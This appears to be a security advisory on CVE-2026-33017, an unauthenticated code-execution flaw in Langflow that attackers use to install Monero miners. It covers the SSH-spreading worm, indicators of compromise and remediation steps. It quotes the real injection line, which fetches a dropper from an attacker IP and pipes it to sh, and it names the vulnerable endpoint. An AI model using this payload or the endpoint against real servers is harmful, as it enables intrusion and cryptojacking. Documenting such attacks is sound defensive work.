CVE-2026-33017 — Langflow RCE Exploited for Monero Mining on AI Servers
AI relevance: Langflow is a widely deployed low-code orchestration platform for LLM pipelines — CVE-2026-33017 gives attackers unauthenticated remote code execution, and exploitation is already deploying cryptominers on AI infrastructure within 20 hours of disclosure.
The vulnerability
- CVE-2026-33017 (CVSS 9.3) affects all Langflow versions prior to 1.9.0. The flaw resides in the
POST /api/v1/build_public_tmp/{flow_id}/flowendpoint, which accepts an attacker-controlledcodefield and evaluates it as Python directly within the server's process context. - No authentication is required. Langflow ships with
AUTO_LOGINenabled by default, granting any unauthenticated visitor a superuser token and the ability to create a public flow on demand. - Trend Micro's TrendAI Research documented active exploitation within 20 hours of public disclosure, with attackers deploying Monero cryptominers on internet-exposed AI servers.
- The injection is a single line:
__import__('os').system('curl hxxp://83[.]142.209[.]214:8080/isp.sh | sh')— this fetches a bash dropper that creates persistence at/var/tmp/.xlamb/and launcheslambsys.elf, a UPX-packed Go binary. - The dropper functions as an SSH-key-reuse worm, enumerating
~/.ssh/known_hostsand agent sockets to propagate laterally to every SSH-reachable host via SCP push, even those with no outbound internet access. - The core payload kills 39 rival cryptominer processes (Kinsing, WatchDog, Outlaw variants) and terminates any processes bound to 13 common mining pool ports — classic territory elimination.
- The 2026 build is 48% smaller than its earliest known variant (May 2024), with VirusTotal detection dropping from 31/66 to 4/66, reflecting deliberate evasion engineering.
- This is the second time in under a year that Langflow has shipped this class of bug — CVE-2025-3248 was exploited by the Flodrix DDoS botnet in June 2025 using an identical primitive.
Why it matters
Langflow is not just another web app — it's the orchestration layer for LLM pipelines, storing API keys, agent configs, tool definitions, and vector database credentials. A successful exploit gives attackers control over the entire AI supply chain for that instance, plus the cloud credentials needed to pivot into broader infrastructure. The SSH worm behavior means a single compromised Langflow server can infect an entire cluster, including air-gapped machines reachable only via SSH.
What to do
- Upgrade immediately: Patch to Langflow 1.9.0 or later. Disable
AUTO_LOGINin all deployments. - Network segmentation: Langflow instances should not have direct SSH access to production clusters. Restrict egress to known mining pool ports and C&C infrastructure.
- Monitor for IOCs: Check for
/var/tmp/.xlamb/,lambsys.elfprocesses, and outbound connections to83[.]142.209[.]214:8080. - Audit API keys: Rotate all LLM provider credentials (OpenAI, Anthropic, etc.) stored in Langflow if exposure is suspected.
- SSH key rotation: Revoke and rotate SSH keys on any host that had connectivity to a compromised Langflow server.